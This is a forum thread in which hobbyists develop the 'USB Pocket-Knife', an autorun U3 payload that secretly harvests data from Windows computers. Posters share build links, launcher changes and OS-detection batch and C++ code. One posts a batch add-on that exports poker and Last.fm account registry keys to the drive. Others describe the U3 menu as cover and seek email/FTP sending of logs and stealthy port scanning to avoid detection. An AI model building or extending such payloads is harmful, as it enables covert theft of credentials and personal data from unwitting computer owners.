USB Pocket-Knife Development

[Jen]

Well...I've uploaded what I've got so far here (U3 version only): http://rs261l3.rapidshare.com/cgi-bin/uplo...873153083554340

Its got the new installer and detection script in it, I know the installer is working, but I haven't had a chance to test the drive detection. USE AT YOUR OWN RISK.

can't download from that link.

[Matessim]

same, link is broke, btw leapo, whats new with it?

[vanguard]

Ok, as promised. Here is the latest version of Leapos Payload including Gonzors U3 menu.

I did not change much, as before:

1. added this to the file GO.VBS

--

If objFSO.FileExists(strPath & "\System\SRC\U3.dat") Then

objShell.Run ".\LaunchU3.exe -a"

End If

--

2. Used Gonzors Autorun.inf, changed it, so that it is starting Leapo`s GO.VBS

3. Depacked Leapo`s U3.ISO, so that I can add the following files from Gonzor to the ISO image:

Autorun.inf, LAUNCHU3.EXE, LAUNCHPAD.ZIP.

4. Added a file "install.txt"

Do not misuse it !

Download:

http://www.megaupload.com/de/?d=493HH4YL

Please follow the instructions in the file "install.txt"

[Jen]

maybe u should had posted after u finish uploading it? anyway, i'll test it after you upload it, even though i don't really like the u3 menu.

[vanguard]

maybe u should had posted after u finish uploading it? anyway, i'll test it after you upload it, even though i don't really like the u3 menu.

Sorry, Jen, I could not wait. My linkspeed is not so very high and I did not believe, someone is so fast in reading the forum. Additionally my time here in Germany is aother than yours in the US.

[Matessim]

i'll test it too, the reason his implanting it is to cover up. i myself, notice when my CPU led is working when it shoulden't and i think many people do, this is an important role for coverup.

[ikeppb]

3. Depacked Leapo`s U3.ISO, so that I can add the following files from Gonzor to the ISO image:

Autorun.inf, LAUNCHU3.EXE, LAUNCHPAD.ZIP.

Does this mean i can maintain use of the U3 menu?

ike,

[vanguard]

Yes, this does it mean. It is my second try, but it is working for me. Now I can run U3 launcher and Leapos Payload at one stick. I think, this is , what some people were looking for.

If it somehow is still not working, please tell me. I am not so good in coding, but I´ll try my very best.

Oh, and I forgot: You have to follow the instructions described in the file "install.txt". Very important, as I left Leapo´s files as they were. Doing so, you can now do this with every version by Leapo, also the ones in the future, too.

Additinally I tried to describe to the community, what I did, so they are able to improve my basic idea and make it better. I thought, this way might be better than to release the finished product.

[Jen]

maybe you should tell people how you did it so that they can update it themselves later?

[vanguard]

maybe you should tell people how you did it so that they can update it themselves later?

I did. Once in my quote earlier, and once in the file "install.txt" , which is sent with the file.

If this is not clear enough, I will be pleased, to do it in the forum again. Was not very much, I did.

Just ask. :)

[Jen]

okay, i'll download once i get home

[Matessim]

leapo can you integrate the email feature(for the logs, the one i want :P) with the port scanner somehow you think? that would TOTALLY rock

[Mark D Surface]

hey does anyone know if the backup and restore functions are working on the non u3 payload?

where does it save the encrypted back-up by default, my back up folder remains empty

thnx in advance

[DMilton]

Hi everybody!

I have some questions about your payload.

I have been testing for some payloads before, but yours is the best one I've ever found.

Have you think about coding your payload in a way it can be useful for everybody in everywhere? I mean, the pocketnife is very useful when it's running in a English Windows machine but... What about other languages as Spanish? :(

Im an spanish user (sorry of my english) and I have to modify your code for doing the same in spanish computers. Instead of this I think there is some ways to find the correct paths without the need of "translating" it.

Ill be proud to help in developing this beatiful tool If you want. ;)

[DMilton]

For all languages OS detection, If you modify:

ver|find "[Version 5.00."
if errorlevel 1 goto SetOSwin2k
ver|find "[Version 5.1."
if errorlevel 1 goto SetOSXP32
ver|find "[Version 5.2."
if errorlevel 1 goto SetOSXP64
ver|find "[Version 6.0."
if errorlevel 1 goto SetOSVISTA32
ver|find "[Version 6.???"
if errorlevel 1 goto SetOSVISTA64
:SetOSDefault
goto SetOSXP32
:SetOSwin2k
SET CurrentOS=win2k
GOTO EndDetect
:SetOSXP32
SET CurrentOS=XP32
GOTO EndDetect
:SetOSXP64
SET CurrentOS=XP64
GOTO EndDetect
:SetOSVISTA32
SET CurrentOS=VISTA32
GOTO EndDetect
:SetOSVISTA64
SET CurrentOS=VISTA64
GOTO EndDetect
:EndDetect

The code will not work for spanish systems (or other I supose), because the ver command shows lines as "Versión 5.00....". You can modify the code with:

ver|find "5.00."
if errorlevel 1 goto SetOSwin2k
ver|find "5.1."
if errorlevel 1 goto SetOSXP32
ver|find "5.2."
if errorlevel 1 goto SetOSXP64
ver|find "6.0."
if errorlevel 1 goto SetOSVISTA32
ver|find "6.???"
if errorlevel 1 goto SetOSVISTA64
:SetOSDefault
goto SetOSXP32
:SetOSwin2k
SET CurrentOS=win2k
GOTO EndDetect
:SetOSXP32
SET CurrentOS=XP32
GOTO EndDetect
:SetOSXP64
SET CurrentOS=XP64
GOTO EndDetect
:SetOSVISTA32
SET CurrentOS=VISTA32
GOTO EndDetect
:SetOSVISTA64
SET CurrentOS=VISTA64
GOTO EndDetect
:EndDetect

It will work for all languages OS's. ;)

[DMilton]

I tried last code in various laptops but in one of them It didnt go as it was expected. It was Windows XP SP3 installed on it but the batch was telling me it was a win2k (1st option of the batch).

I tried this code and went perfect in all of the systems.

ver|find "5.00."
if %errorlevel% EQU 0 goto SetOSwin2k
ver|find "5.1."
if %errorlevel% EQU 0 goto SetOSXP32
ver|find "5.2."
if %errorlevel% EQU 0 goto SetOSXP64
ver|find "6.0."
if %errorlevel% EQU 0 goto SetOSVISTA32
ver|find "6.???"
if %errorlevel% EQU 0 goto SetOSVISTA64
:SetOSDefault
goto SetOSXP32
:SetOSwin2k
SET CurrentOS=win2k
GOTO EndDetect
:SetOSXP32
SET CurrentOS=XP32
GOTO EndDetect
:SetOSXP64
SET CurrentOS=XP64
GOTO EndDetect
:SetOSVISTA32
SET CurrentOS=VISTA32
GOTO EndDetect
:SetOSVISTA64
SET CurrentOS=VISTA64
GOTO EndDetect
:EndDetect

Someone knows why the batch was jumping the "if errorlevel 1 goto..." instruction?

May be this code works better?

[Tmbomber]

I had a problem of the batch file not finding the "FIND" command.

I made mine look like:

ver|%windir%\system32\find.exe "[Version 5.00."

I need to check if win2k has a system32 directory.

(It'd probably be easiest to just put a copy of the "FIND" command on the thumbdrive)

[m0u53]

there is a way to find the Windows Version in C++

if that will help?

[m0u53]

#include <windows.h>
#include <stdio.h>

void main()
{
    DWORD dwVersion = 0;
    DWORD dwMajorVersion = 0;
    DWORD dwMinorVersion = 0;
    DWORD dwBuild = 0;

    dwVersion = GetVersion();

    // Get the Windows version.

    dwMajorVersion = (DWORD)(LOBYTE(LOWORD(dwVersion)));
    dwMinorVersion = (DWORD)(HIBYTE(LOWORD(dwVersion)));

    // Get the build number.

    if (dwVersion < 0x80000000)              
        dwBuild = (DWORD)(HIWORD(dwVersion));
    

    printf("Version is %d.%d (%d)\n", 
                dwMajorVersion,
                dwMinorVersion,
                dwBuild);
}

and i could modify it as follows

if

win98 run stuff from win98 folder

if

winxp run stuff from winxp folder

etc..etc..

[tyler durden]

First of all, great work Leapo. Like the improvement from the Gonzor .iso. Just wanted to suggest a couple of things that would make it a even better tool.

A custom regfile exporter:

Let say i would like These reg files:

Computer\HKEY_CURRENT_USER\Software\Full Tilt Poker\Userinfo
Computer\HKEY_CURRENT_USER\Software\PartyGaming

Something like Manage settings > Other options > Add registry entrains to look for

Options could be registry name and location.

So my entrains would be:

Partypoker:HKEY_CURRENT_USER\Software\PartyGaming
Fulltilt:HKEY_CURRENT_USER\Software\Full Tilt Poker

Syntax:

regedit.exe /e Partypoker.reg "HKEY_CURRENT_USER\Software\PartyGaming"
regedit.exe /e Fulltilt.reg "HKEY_CURRENT_USER\Software\Full Tilt Poker"

partypoker.reg and fulltilt.reg could be saved in %logdir%\Registry_Files

Hope you will consider my idea and good luck with further development .

my current addon:

:: Checks the state of Registry.cfg
IF NOT EXIST %config%\Registry.cfg GOTO SkipRegistry

IF NOT EXIST %flshdrv%\LOGS\%computername%\registry MD %flshdrv%\LOGS\%computername%\registry
    ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +            [Registry dump]         + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1

    regedit.exe /e %logdir%\registry\Fulltilt.reg "HKEY_CURRENT_USER\Software\Full Tilt Poker" 
    regedit.exe /e %logdir%\registry\partypoker.reg "HKEY_CURRENT_USER\Software\PartyGaming" 
    regedit.exe /e %logdir%\lastfm.reg "HKEY_CURRENT_USER\Software\Last.fm\Client\Users"
    
    ECHO +----------------------------------+ >> %log% 2>&1
    ECHO +      [registry entries were copied] + >> %log% 2>&1
    ECHO +----------------------------------+ >> %log% 2>&1

:SkipRegistry

haven't tested it yet.

[DMilton]

I had a problem of the batch file not finding the "FIND" command.

I made mine look like:

ver|%windir%\system32\find.exe "[Version 5.00."

I need to check if win2k has a system32 directory.

(It'd probably be easiest to just put a copy of the "FIND" command on the thumbdrive)

Windows 2000 has a system32 directory then the code must work.

You can also try with:

ver|%systemroot%\system32\find.exe "[Version 5.00."

or

ver|%systemroot%\system32\find.exe "5.00."

for all os languages... :P

[DMilton]

#include <windows.h>
#include <stdio.h>
...etc...
}

and i could modify it as follows

if

win98 run stuff from win98 folder

if

winxp run stuff from winxp folder

etc..etc..

1st. I think is a good idea. Probably resolves some problems with the OS detection but... must be compiled or just works as a vb routine? Is your code faster than the piece of the batch that did the same before? Have you verified it?

2nd. Can the code determine when a WinXP32 or WinXP64 (as Vista) is installed?

3rd. May be I must try it before asking nonsenses but can you post the results?

4th. Can you do the same with the language installation? :P

[m0u53]

well i must admit i kinda jumped at the last problem the code does work by defualt my code just displays the version number major.minor (build no)

my output was:

Version is 5.1 (2600)

Press any key to continue . . .

i can make switch based on what os ver is detected

as for 32/64 bit i belive Windows API has a function for that aslo

yes it needs to be compiled...if i can get this working i will upload it to my site(NOT RS)

is it faster then batch? LOL...you bet your sweet ass it is and its also faster the vb/vbs but if Steve8x or someone else swooped in and coded it in asm...you would see an extreme speed increase

but heh im just a C++ programmer

im just having a small problem understanding whats the purpose of the reason needing this program tho :)

[Matessim]

Anyone knows working arround sockets? i really wanna get the FTP/email feature up and running :P. and if it could integrate with the port scan. Woah. thats teh rocks., so it wont try to connect if port 21 is blocked for instance, so it will give output PORT BLOCKED, and wont attempt. so that it wont raise any bells.

[m0u53]

well if i understand you correctly you wanna do a port scan to check and see if a port is open or not?

if thats the case then just doing that will "raise some bells"

i belive using raw sockets and sending SYN_ACK packets may be a safe way

as many of you might now it works as follow...iirc

send the SYN

victim returns with ACK

send SYN again

i belive its called a 3-way handshake...maybe this can be done in a easy fashion...idk